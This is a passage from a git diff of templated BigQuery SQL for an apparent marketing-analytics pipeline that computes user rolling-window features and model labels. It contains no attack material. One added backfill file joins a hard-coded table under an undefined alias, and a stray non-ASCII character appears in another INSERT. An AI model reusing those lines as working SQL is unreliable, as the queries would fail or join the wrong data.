number of {{feature.feature_name}} made in the past 3 days + MAX(COUNT(DISTINCT CASE WHEN DATE_DIFF(input_date, event_date, DAY) = 3 THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id) AS {{feature.feature_name}}_past_3_day, + -- Calculate the number of {{feature.feature_name}} made in the past 4 days + MAX(COUNT(DISTINCT CASE WHEN DATE_DIFF(input_date, event_date, DAY) = 4 THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id) AS {{feature.feature_name}}_past_4_day, + -- Calculate the number of {{feature.feature_name}} made in the past 5 days + MAX(COUNT(DISTINCT CASE WHEN DATE_DIFF(input_date, event_date, DAY) = 5 THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id) AS {{feature.feature_name}}_past_5_day +FROM `{{mds_project_id}}.{{mds_dataset}}.event` as E +-- Filter events within the defined date range +WHERE event_date BETWEEN end_date AND input_date +-- Filter for {{feature.feature_name}} events +AND event_name='{{feature.feature_name}}' +-- Ensure valid session ID +AND ga_session_id IS NOT NULL +-- Group the results by user pseudo ID +GROUP BY user_pseudo_id +); + +{% endfor %} + +-- All users in the platform +CREATE OR REPLACE TEMP TABLE events_users_days as ( + SELECT DISTINCT + -- User pseudo ID + Users.user_pseudo_id, + -- distinct event date + Days.event_date as event_date + FROM `{{mds_project_id}}.{{mds_dataset}}.event` Users + -- 'Days' is an alias for a temporary table containing distinct event dates + CROSS JOIN + (SELECT DISTINCT event_date FROM `{{mds_project_id}}.{{mds_dataset}}.event`) Days + INNER JOIN `{{mds_project_id}}.{{mds_dataset}}.device` as D + ON Users.device_type_id = D.device_type_id + -- Exclude events without a valid session ID + WHERE Users.ga_session_id IS NOT NULL + -- Exclude events without a valid device operating system + AND D.device_os IS NOT NULL + -- Filter events within the defined date range + AND Days.event_date BETWEEN end_date AND input_date) +; + +-- Create a temporary table to store data for the target table +CREATE OR REPLACE TEMP TABLE DataForTargetTable AS +SELECT DISTINCT + -- Current timestamp + CURRENT_TIMESTAMP() AS processed_timestamp, + -- Feature date + input_date AS feature_date, + -- User pseudo ID + EUD.user_pseudo_id{% for feature in short_list_features %}, + COALESCE({{feature.feature_name}}_past_1_day,0) AS {{feature.feature_name}}_past_1_day, + COALESCE({{feature.feature_name}}_past_2_day,0) AS {{feature.feature_name}}_past_2_day, + COALESCE({{feature.feature_name}}_past_3_day,0) AS {{feature.feature_name}}_past_3_day, + COALESCE({{feature.feature_name}}_past_4_day,0) AS {{feature.feature_name}}_past_4_day, + COALESCE({{feature.feature_name}}_past_5_day,0) AS {{feature.feature_name}}_past_5_day{% endfor %} + FROM events_users_days AS EUD{% for feature in short_list_features %} + FULL OUTER JOIN rolling_{{feature.feature_name}}_past_days AS {{feature.feature_name}} + ON EUD.user_pseudo_id = {{feature.feature_name}}.user_pseudo_id{% endfor %} + -- Exclude rows without a valid user pseudo ID + WHERE EUD.user_pseudo_id IS NOT NULL + ; + +-- Merge data into the target table +MERGE `{{project_id}}.{{dataset}}.{{insert_table}}` I +USING DataForTargetTable T +ON I.feature_date = T.feature_date + AND I.user_pseudo_id = T.user_pseudo_id +WHEN MATCHED THEN + UPDATE SET + -- Update the processed timestamp and rolling window features + I.processed_timestamp = T.processed_timestamp{% for feature in short_list_features %}, + I.{{feature.feature_name}}_past_1_day = T.{{feature.feature_name}}_past_1_day, + I.{{feature.feature_name}}_past_2_day = T.{{feature.feature_name}}_past_2_day, + I.{{feature.feature_name}}_past_3_day = T.{{feature.feature_name}}_past_3_day, + I.{{feature.feature_name}}_past_4_day = T.{{feature.feature_name}}_past_4_day, + I.{{feature.feature_name}}_past_5_day = T.{{feature.feature_name}}_past_5_day{% endfor %} +WHEN NOT MATCHED THEN + INSERT + (processed_timestamp, + feature_date, + user_pseudo_id{% for feature in short_list_features %}, + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day{% endfor %}) + VALUES + (T.processed_timestamp, + T.feature_date, + T.user_pseudo_id{% for feature in short_list_features %}, + T.{{feature.feature_name}}_past_1_day, + T.{{feature.feature_name}}_past_2_day, + T.{{feature.feature_name}}_past_3_day, + T.{{feature.feature_name}}_past_4_day, + T.{{feature.feature_name}}_past_5_day{% endfor %}) +; + +-- Set a variable to track the number of rows added +SET rows_added = (SELECT COUNT(DISTINCT user_pseudo_id) FROM `{{project_id}}.{{dataset}}.{{insert_table}}`); diff --git a/sql/query/create_gemini_model.sqlx b/sql/query/create_gemini_model.sqlx index 84612d8f..4e365c4a 100644 --- a/sql/query/create_gemini_model.sqlx +++ b/sql/query/create_gemini_model.sqlx @@ -18,6 +18,6 @@ -- Your supervised tuning computations also occur in the europe-west4 region, because that's where TPU resources are located. -- Create a {{endpoint_name}} model using a remote connection to {{region}}.{{connection_name}} -CREATE OR REPLACE MODEL `{{project_id}}.{{dataset}}.{{model_name}}` +CREATE MODEL IF NOT EXISTS `{{project_id}}.{{dataset}}.{{model_name}}` REMOTE WITH CONNECTION `{{project_id}}.{{region}}.{{connection_name}}` OPTIONS (ENDPOINT = '{{endpoint_name}}'); \ No newline at end of file diff --git a/sql/query/invoke_backfill_churn_propensity_label.sqlx b/sql/query/invoke_backfill_churn_propensity_label.sqlx index 4cbe77ac..9dd41da7 100644 --- a/sql/query/invoke_backfill_churn_propensity_label.sqlx +++ b/sql/query/invoke_backfill_churn_propensity_label.sqlx @@ -119,7 +119,13 @@ GROUP BY ); -- Insert data into the target table, combining user information with churn and bounce status -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + churned, + bounced +) SELECT DISTINCT -- Current timestamp as the processing timestamp CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_customer_lifetime_value_label.sqlx b/sql/query/invoke_backfill_customer_lifetime_value_label.sqlx index 27ea59d0..569e5db5 100644 --- a/sql/query/invoke_backfill_customer_lifetime_value_label.sqlx +++ b/sql/query/invoke_backfill_customer_lifetime_value_label.sqlx @@ -109,7 +109,14 @@ CREATE OR REPLACE TEMP TABLE future_revenue_per_user AS ( ); -- Insert data into the target table -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + pltv_revenue_30_days, + pltv_revenue_90_days, + pltv_revenue_180_days +) SELECT DISTINCT -- Current timestamp of the processing CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_lead_score_propensity_label.sqlx b/sql/query/invoke_backfill_lead_score_propensity_label.sqlx new file mode 100644 index 00000000..eba85784 --- /dev/null +++ b/sql/query/invoke_backfill_lead_score_propensity_label.sqlx @@ -0,0 +1,116 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- Declares a variable to store the maximum date for analysis +DECLARE max_date DATE; +-- Declares a variable to store the minimum date for analysis +DECLARE min_date DATE; +-- Sets the max_date variable to the latest event_date minus a specified number of days ({{interval_max_date}}) from the 'event' table +SET max_date = (SELECT DATE_SUB(MAX(event_date), INTERVAL {{interval_max_date}} DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +-- Sets the min_date variable to the earliest event_date plus a specified number of days ({{interval_min_date}}) from the 'event' table +SET min_date = (SELECT DATE_ADD(MIN(event_date), INTERVAL {{interval_min_date}} DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + +-- If min_date > maximum event_date OR max_date < minimum event_date, then set min_date for the max event_date and set max_date for the min event_date +IF min_date >= (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR max_date <= (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR min_date >= max_date THEN + SET min_date = (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + SET max_date = (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +-- This code block acts as a safeguard to ensure that the min_date and max_date used for further analysis are always within the bounds of the actual data available in the table. +-- It prevents situations where calculations might mistakenly consider dates beyond the real data range, which could lead to errors or misleading results. +IF max_date > (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR min_date < (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) THEN + SET min_date = (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + SET max_date = (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +-- Creates a temporary table called dates_interval to store distinct event dates and their corresponding end dates +CREATE OR REPLACE TEMP TABLE dates_interval as ( + SELECT DISTINCT + -- Selects the distinct event_date and assigns it to the column input_date + event_date as input_date, + -- Calculates the end date by adding a specified number of days ({{interval_end_date}}) to the input_date + DATE_ADD(event_date, INTERVAL {{interval_end_date}} DAY) as end_date + FROM `{{mds_project_id}}.{{mds_dataset}}.event` + -- Filters the events to include only those within the defined date range (between min_date and max_date) + WHERE event_date BETWEEN min_date AND max_date + ORDER BY input_date DESC +); + +-- All users in the platform +-- Creates a temporary table called all_users_possible_{{target_event}}s to store user {{target_event}} data +CREATE OR REPLACE TEMP TABLE all_users_possible_{{target_event}}s as ( + SELECT DISTINCT + -- Selects the user_pseudo_id from the 'event' table and assigns it to the column user_pseudo_id + Users.user_pseudo_id, + -- Selects the event_date from the date array generated using GENERATE_DATE_ARRAY and assigns it to the column feature_date + DI.event_date as feature_date, + -- Creates a series of columns ({{target_event}}_day_1) and initializes them with NULL values + -- These columns will be populated later with {{target_event}} data for specific days + NULL as {{target_event}}_day_1 + FROM `{{mds_project_id}}.{{mds_dataset}}.event` Users + -- Performs a cross join with a subquery that generates a date array using GENERATE_DATE_ARRAY + -- The date array includes dates from min_date to max_date with a 1-day interval + CROSS JOIN (SELECT event_date FROM UNNEST(GENERATE_DATE_ARRAY(min_date, max_date, INTERVAL 1 DAY)) as event_date) as DI + -- Filters the data to include events where event_name is '{{target_event}}' + WHERE LOWER(Users.event_name) IN ('{{target_event}}') + AND Users.ga_session_id IS NOT NULL + ); + +-- Creates a temporary table called future_{{target_event}}s_per_user to store user {{target_event}} data in the future +-- Future User metrics: 1-7-day future {{target_event}}s per user, 1-day future {{target_event}}s per user +CREATE OR REPLACE TEMP TABLE future_{{target_event}}s_per_user AS ( + SELECT + -- Selects user_pseudo_id from the event table and assigns it to column user_pseudo_id + user_pseudo_id, + -- Selects input_date from the dates_interval table and assigns it to column feature_date + input_date as feature_date, + -- This calculation is performed over a window partitioned by user_pseudo_id and input_date + -- Repeats the above logic for different day offsets (1) to calculate future {{target_event}} counts for different days + MAX(COUNT(DISTINCT CASE DATE_DIFF(event_date, input_date, DAY) = 1 WHEN TRUE THEN ecommerce.transaction_id END)) OVER(PARTITION BY user_pseudo_id, input_date) AS {{target_event}}_day_1 + FROM `{{mds_project_id}}.{{mds_dataset}}.event` as E + INNER JOIN `{{mds_project_id}}.{{mds_dataset}}.device` as D + ON E.device_type_id = D.device_type_id + CROSS JOIN dates_interval as DI + -- Filters events to be within the date range defined by input_date and end_date from dates_interval + WHERE E.event_date BETWEEN DI.input_date AND DI.end_date + AND LOWER(E.event_name) IN ('{{target_event}}') + AND E.ga_session_id IS NOT NULL + AND D.device_os IS NOT NULL + -- Groups the result by user_pseudo_id and feature_date + GROUP BY user_pseudo_id, feature_date +); + +-- Inserts data into the target table +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + {{target_event}}_day_1 +) +SELECT DISTINCT + -- Selects the current timestamp and assigns it to the column processed_timestamp + CURRENT_TIMESTAMP() AS processed_timestamp, + -- Selects the feature_date from the all_users_possible_{{target_event}}s table and assigns it to the column feature_date + A.feature_date, + -- Selects the user_pseudo_id from the all_users_possible_{{target_event}}s table and assigns it to the column user_pseudo_id + A.user_pseudo_id, + -- Uses the LEAST function to get the minimum value between the coalesced value of {{target_event}}_day_1 and 1 + -- COALESCE is used to handle null values, replacing them with 0 + -- This pattern is repeated for {{target_event}}_day_1 to populate the respective columns + LEAST(COALESCE(B.{{target_event}}_day_1, 0), 1) AS {{target_event}}_day_1 +FROM all_users_possible_{{target_event}}s AS A +-- Performs a left join with the future_{{target_event}}s_per_user table (aliased as B) using user_pseudo_id and feature_date +LEFT JOIN future_{{target_event}}s_per_user AS B +ON B.user_pseudo_id = A.user_pseudo_id AND B.feature_date = A.feature_date +; \ No newline at end of file diff --git a/sql/query/invoke_backfill_purchase_propensity_label.sqlx b/sql/query/invoke_backfill_purchase_propensity_label.sqlx index a2c8bee0..b062dc58 100644 --- a/sql/query/invoke_backfill_purchase_propensity_label.sqlx +++ b/sql/query/invoke_backfill_purchase_propensity_label.sqlx @@ -125,7 +125,26 @@ CREATE OR REPLACE TEMP TABLE future_purchases_per_user AS ( ); -- Inserts data into the target table -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + purchase_day_1, + purchase_day_2, + purchase_day_3, + purchase_day_4, + purchase_day_5, + purchase_day_6, + purchase_day_7, + purchase_day_8, + purchase_day_9, + purchase_day_10, + purchase_day_11, + purchase_day_12, + purchase_day_13, + purchase_day_14, + purchase_day_15_30 +) SELECT DISTINCT -- Selects the current timestamp and assigns it to the column processed_timestamp CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_dimensions.sqlx b/sql/query/invoke_backfill_user_dimensions.sqlx index c27dd299..6c81b412 100644 --- a/sql/query/invoke_backfill_user_dimensions.sqlx +++ b/sql/query/invoke_backfill_user_dimensions.sqlx @@ -122,7 +122,31 @@ CREATE OR REPLACE TEMP TABLE events_users as ( ; -- Inserting aggregated user data into the target table. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id +) SELECT DISTINCT -- Timestamp of the data processing CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_lifetime_dimensions.sqlx b/sql/query/invoke_backfill_user_lifetime_dimensions.sqlx index 4001878f..b05611e0 100644 --- a/sql/query/invoke_backfill_user_lifetime_dimensions.sqlx +++ b/sql/query/invoke_backfill_user_lifetime_dimensions.sqlx @@ -137,7 +137,31 @@ CREATE OR REPLACE TEMP TABLE events_users as ( -- This code block inserts data into the specified table, combining information from the "events_users" table -- and the "user_dimensions_event_session_scoped" table. -- It aggregates user-level features for each user and date. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id +) SELECT DISTINCT -- The current timestamp. CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_lookback_metrics.sqlx b/sql/query/invoke_backfill_user_lookback_metrics.sqlx index 25e3566b..37bd4563 100644 --- a/sql/query/invoke_backfill_user_lookback_metrics.sqlx +++ b/sql/query/invoke_backfill_user_lookback_metrics.sqlx @@ -230,7 +230,25 @@ AND D.device_os IS NOT NULL -- This code is part of a larger process for building a machine learning model that predicts -- user behavior based on their past activity. The features generated by this code can be used -- as input to the model, helping it learn patterns and make predictions. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}`Β ( + processed_timestamp, + feature_date, + user_pseudo_id, + active_users_past_1_7_day, + active_users_past_8_14_day, + purchases_past_1_7_day, + purchases_past_8_14_day, + visits_past_1_7_day, + visits_past_8_14_day, + view_items_past_1_7_day, + view_items_past_8_14_day, + add_to_carts_past_1_7_day, + add_to_carts_past_8_14_day, + checkouts_past_1_7_day, + checkouts_past_8_14_day, + ltv_revenue_past_1_7_day, + ltv_revenue_past_7_15_day +) SELECT DISTINCT -- Timestamp indicating when the data was processed CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_rolling_window_lead_metrics.sqlx b/sql/query/invoke_backfill_user_rolling_window_lead_metrics.sqlx new file mode 100644 index 00000000..b8b364cc --- /dev/null +++ b/sql/query/invoke_backfill_user_rolling_window_lead_metrics.sqlx @@ -0,0 +1,127 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- This SQL code defines a series of temporary tables to calculate and store user engagement metrics based on +-- rolling window aggregations. These tables are then used to populate a target table with daily user engagement features. + +DECLARE max_date DATE; +DECLARE min_date DATE; +-- Sets max_date to the latest event_date from the event table, minus an offset specified by the interval_max_date +SET max_date = (SELECT DATE_SUB(MAX(event_date), INTERVAL {{interval_max_date}} DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +-- Sets min_date to the earliest event_date from the event table, plus an offset specified by the interval_min_date +SET min_date = (SELECT DATE_ADD(MIN(event_date), INTERVAL {{interval_min_date}} DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + +-- If min_date > maximum event_date OR max_date < minimum event_date, then set min_date for the max event_date and set max_date for the min event_date +IF min_date >= (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR max_date <= (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR min_date >= max_date THEN + SET min_date = (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + SET max_date = (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +-- This code block acts as a safeguard to ensure that the min_date and max_date used for further analysis are always within the bounds of the actual data available in the table. +-- It prevents situations where calculations might mistakenly consider dates beyond the real data range, which could lead to errors or misleading results. +IF max_date > (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR min_date < (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) THEN + SET min_date = (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + SET max_date = (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +-- This section determines the date range for analysis and creates a temporary table dates_interval with distinct date intervals. +CREATE OR REPLACE TEMP TABLE dates_interval as ( + SELECT DISTINCT + -- Select each distinct event_date as 'input_date', representing the current date in the analysis + event_date as input_date, + -- Calculate the 'end_date' by subtracting a specified interval from the 'input_date' + DATE_SUB(event_date, INTERVAL {{interval_end_date}} DAY) as end_date + FROM `{{mds_project_id}}.{{mds_dataset}}.event` + WHERE event_date BETWEEN min_date AND max_date + ORDER BY input_date DESC +); + +{% for feature in short_list_features %} +-- Run these windows aggregations every day. For each date in training and inference date ranges. +-- All users metrics: 1–5-day {{feature.feature_name}} users +CREATE OR REPLACE TEMP TABLE rolling_{{feature.feature_name}}_past_days AS ( + SELECT + user_pseudo_id, + input_date as feature_date, + -- Number of times the user has {{feature.feature_name}} in the past 1st day + MAX(COUNT(DISTINCT CASE DATE_DIFF(input_date, event_date, DAY) = 1 WHEN TRUE THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id, input_date) AS {{feature.feature_name}}_past_1_day, + -- Number of times the user has {{feature.feature_name}} in the past 2nd day + MAX(COUNT(DISTINCT CASE DATE_DIFF(input_date, event_date, DAY) = 2 WHEN TRUE THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id, input_date) AS {{feature.feature_name}}_past_2_day, + -- Number of times the user has {{feature.feature_name}} in the past 3rd day + MAX(COUNT(DISTINCT CASE DATE_DIFF(input_date, event_date, DAY) = 3 WHEN TRUE THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id, input_date) AS {{feature.feature_name}}_past_3_day, + -- Number of times the user has {{feature.feature_name}} in the past 4th day + MAX(COUNT(DISTINCT CASE DATE_DIFF(input_date, event_date, DAY) = 4 WHEN TRUE THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id, input_date) AS {{feature.feature_name}}_past_4_day, + -- Number of times the user has {{feature.feature_name}} in the past 5th day + MAX(COUNT(DISTINCT CASE DATE_DIFF(input_date, event_date, DAY) = 5 WHEN TRUE THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id, input_date) AS {{feature.feature_name}}_past_5_day + FROM `{{mds_project_id}}.{{mds_dataset}}.event` as E + CROSS JOIN dates_interval as DI + -- Filter events to be within the defined date range + WHERE E.event_date BETWEEN DI.end_date AND DI.input_date + -- Filter for {{feature.feature_name}} events + AND event_name='{{feature.feature_name}}' + -- Ensure valid session ID + AND ga_session_id IS NOT NULL + -- Group the results by user pseudo ID and feature date + GROUP BY user_pseudo_id, feature_date +); + +{% endfor %} + +-- All users in the platform +-- This code creates a temporary table that contains a distinct list of user pseudo IDs +-- and their corresponding feature dates, filtering for events with valid session IDs, +-- device operating systems, and falling within the specified date range. +CREATE OR REPLACE TEMP TABLE events_users as ( + SELECT DISTINCT + Users.user_pseudo_id, + DI.input_date as feature_date + FROM `{{mds_project_id}}.{{mds_dataset}}.event` Users + INNER JOIN `{{mds_project_id}}.{{mds_dataset}}.device` as D + ON Users.device_type_id = D.device_type_id + CROSS JOIN dates_interval as DI + WHERE Users.ga_session_id IS NOT NULL + AND Users.event_date BETWEEN DI.end_date AND DI.input_date + AND D.device_os IS NOT NULL +); + +-- This code block inserts data into a table, combining information from the events_users +-- table and several temporary tables containing rolling window features. The resulting data +-- represents user-level features for each user and date, capturing their past activity within +-- different time windows. +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id{% for feature in short_list_features %}, + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day{% endfor %} +) + SELECT DISTINCT + -- This selects the current timestamp and assigns it to the column processed_timestamp. + CURRENT_TIMESTAMP() AS processed_timestamp, + EUD.feature_date, + EUD.user_pseudo_id{% for feature in short_list_features %}, + COALESCE({{feature.feature_name}}_past_1_day,0) AS {{feature.feature_name}}_past_1_day, + COALESCE({{feature.feature_name}}_past_2_day,0) AS {{feature.feature_name}}_past_2_day, + COALESCE({{feature.feature_name}}_past_3_day,0) AS {{feature.feature_name}}_past_3_day, + COALESCE({{feature.feature_name}}_past_4_day,0) AS {{feature.feature_name}}_past_4_day, + COALESCE({{feature.feature_name}}_past_5_day,0) AS {{feature.feature_name}}_past_5_day{% endfor %} + FROM events_users AS EUD{% for feature in short_list_features %} + FULL OUTER JOIN rolling_scroll_50_past_days AS {{feature.feature_name}} + ON EUD.user_pseudo_id = A.user_pseudo_id{% endfor %} + -- This filters the results to include only rows where the user_pseudo_id is not null. + WHERE EUD.user_pseudo_id IS NOT NULL + ; \ No newline at end of file diff --git a/sql/query/invoke_backfill_user_rolling_window_lifetime_metrics.sqlx b/sql/query/invoke_backfill_user_rolling_window_lifetime_metrics.sqlx index 2ee219f1..b4a0a415 100644 --- a/sql/query/invoke_backfill_user_rolling_window_lifetime_metrics.sqlx +++ b/sql/query/invoke_backfill_user_rolling_window_lifetime_metrics.sqlx @@ -283,7 +283,50 @@ AND D.device_os IS NOT NULL -- This code is part of a larger process for building a machine learning model that predicts -- user behavior based on their past activity. The features generated by this code can be used -- as input to the model, helping it learn patterns and make predictions. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + active_users_past_1_30_day, + active_users_past_30_60_day, + active_users_past_60_90_day, + active_users_past_90_120_day, + active_users_past_120_150_day, + active_users_past_150_180_day, + purchases_past_1_30_day, + purchases_past_30_60_day, + purchases_past_60_90_day, + purchases_past_90_120_day, + purchases_past_120_150_day, + purchases_past_150_180_day, + visits_past_1_30_day, + visits_past_30_60_day, + visits_past_60_90_day, + visits_past_90_120_day, + visits_past_120_150_day, + visits_past_150_180_day, + view_items_past_1_30_day, + view_items_past_30_60_day, + view_items_past_60_90_day, + view_items_past_90_120_day, + view_items_past_120_150_day, + view_items_past_150_180_day, + add_to_carts_past_1_30_day, + add_to_carts_past_30_60_day, + add_to_carts_past_60_90_day, + add_to_carts_past_90_120_day, + add_to_carts_past_120_150_day, + add_to_carts_past_150_180_day, + checkouts_past_1_30_day, + checkouts_past_30_60_day, + checkouts_past_60_90_day, + checkouts_past_90_120_day, + checkouts_past_120_150_day, + checkouts_past_150_180_day, + ltv_revenue_past_1_30_day, + ltv_revenue_past_30_90_day, + ltv_revenue_past_90_180_day +) SELECT DISTINCT -- This selects the current timestamp and assigns it to the column processed_timestamp. CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_rolling_window_metrics.sqlx b/sql/query/invoke_backfill_user_rolling_window_metrics.sqlx index 9317225a..be0a0860 100644 --- a/sql/query/invoke_backfill_user_rolling_window_metrics.sqlx +++ b/sql/query/invoke_backfill_user_rolling_window_metrics.sqlx @@ -272,7 +272,65 @@ CREATE OR REPLACE TEMP TABLE events_users as ( -- table and several temporary tables containing rolling window features. The resulting data -- represents user-level features for each user and date, capturing their past activity within -- different time windows. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + active_users_past_1_day, + active_users_past_2_day, + active_users_past_3_day, + active_users_past_4_day, + active_users_past_5_day, + active_users_past_6_day, + active_users_past_7_day, + active_users_past_8_14_day, + active_users_past_15_30_day, + purchases_past_1_day, + purchases_past_2_day, + purchases_past_3_day, + purchases_past_4_day, + purchases_past_5_day, + purchases_past_6_day, + purchases_past_7_day, + purchases_past_8_14_day, + purchases_past_15_30_day, + visits_past_1_day, + visits_past_2_day, + visits_past_3_day, + visits_past_4_day, + visits_past_5_day, + visits_past_6_day, + visits_past_7_day, + visits_past_8_14_day, + visits_past_15_30_day, + view_items_past_1_day, + view_items_past_2_day, + view_items_past_3_day, + view_items_past_4_day, + view_items_past_5_day, + view_items_past_6_day, + view_items_past_7_day, + view_items_past_8_14_day, + view_items_past_15_30_day, + add_to_carts_past_1_day, + add_to_carts_past_2_day, + add_to_carts_past_3_day, + add_to_carts_past_4_day, + add_to_carts_past_5_day, + add_to_carts_past_6_day, + add_to_carts_past_7_day, + add_to_carts_past_8_14_day, + add_to_carts_past_15_30_day, + checkouts_past_1_day, + checkouts_past_2_day, + checkouts_past_3_day, + checkouts_past_4_day, + checkouts_past_5_day, + checkouts_past_6_day, + checkouts_past_7_day, + checkouts_past_8_14_day, + checkouts_past_15_30_day +) SELECT DISTINCT -- This selects the current timestamp and assigns it to the column processed_timestamp. CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_scoped_lifetime_metrics.sqlx b/sql/query/invoke_backfill_user_scoped_lifetime_metrics.sqlx index bfb93869..ed4bf30e 100644 --- a/sql/query/invoke_backfill_user_scoped_lifetime_metrics.sqlx +++ b/sql/query/invoke_backfill_user_scoped_lifetime_metrics.sqlx @@ -163,7 +163,35 @@ CREATE OR REPLACE TEMP TABLE first_purchasers as ( ); -- This SQL code calculates various user engagement and revenue metrics at a daily level and inserts the results into a target table. It leverages several temporary tables created earlier in the script to aggregate data efficiently. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + lifetime_purchasers_users, + lifetime_average_daily_purchasers, + lifetime_active_users, + lifetime_DAU, + lifetime_MAU, + lifetime_WAU, + lifetime_dau_per_mau, + lifetime_dau_per_wau, + lifetime_wau_per_mau, + lifetime_users_engagement_duration_seconds, + lifetime_average_engagement_time, + lifetime_average_engagement_time_per_session, + lifetime_average_sessions_per_user, + lifetime_ARPPU, + lifetime_ARPU, + lifetime_average_daily_revenue, + lifetime_max_daily_revenue, + lifetime_min_daily_revenue, + lifetime_new_users, + lifetime_returning_users, + 